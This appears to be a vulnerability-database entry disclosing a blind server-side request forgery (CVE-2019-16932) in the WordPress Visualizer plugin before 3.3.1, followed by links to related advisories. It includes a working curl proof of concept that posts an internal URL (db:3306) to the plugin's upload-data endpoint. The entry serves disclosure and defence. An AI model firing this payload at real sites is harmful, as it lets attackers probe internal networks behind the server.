Lucene search
WpvulndbWPVDB-ID:B7A932EA-9086-4615-9176-EE1043914040HistorySep 28, 2019 - 12:00 a.m.
Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
2019-09-2800:00:00
wpscan.com
9
EPSS
0.256
Percentile
96.8%
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
PoC
curl -i -s -X $‘POST’ \ -H $‘Host: 192.168.158.128:8000’ \ --data-binary $‘{"url":"http://db:3306"}’ \ $‘http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data’ See the references for more details
Related
wpexploit
wpexploit
Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
2019-09-28 00:00:00
nvd
nvd
CVE-2019-16932
2019-09-30 16:15:11
cve
cve
CVE-2019-16932
2019-09-30 16:15:11
prion
prion
Server side request forgery (ssrf)
2019-09-30 16:15:00
nuclei
nuclei
Visualizer <3.3.1 - Blind Server-Side Request Forgery
2022-05-10 20:15:58
cvelist
cvelist
CVE-2019-16932
2019-09-30 15:08:55
patchstack
patchstack
WordPress Visualizer plugin <= 3.3.0 - Server-Side Request Forgery (SSRF)
2019-09-28 00:00:00
openvas
openvas
WordPress Visualizer Plugin < 3.3.1 Multiple Vulnerabilities
2019-10-02 00:00:00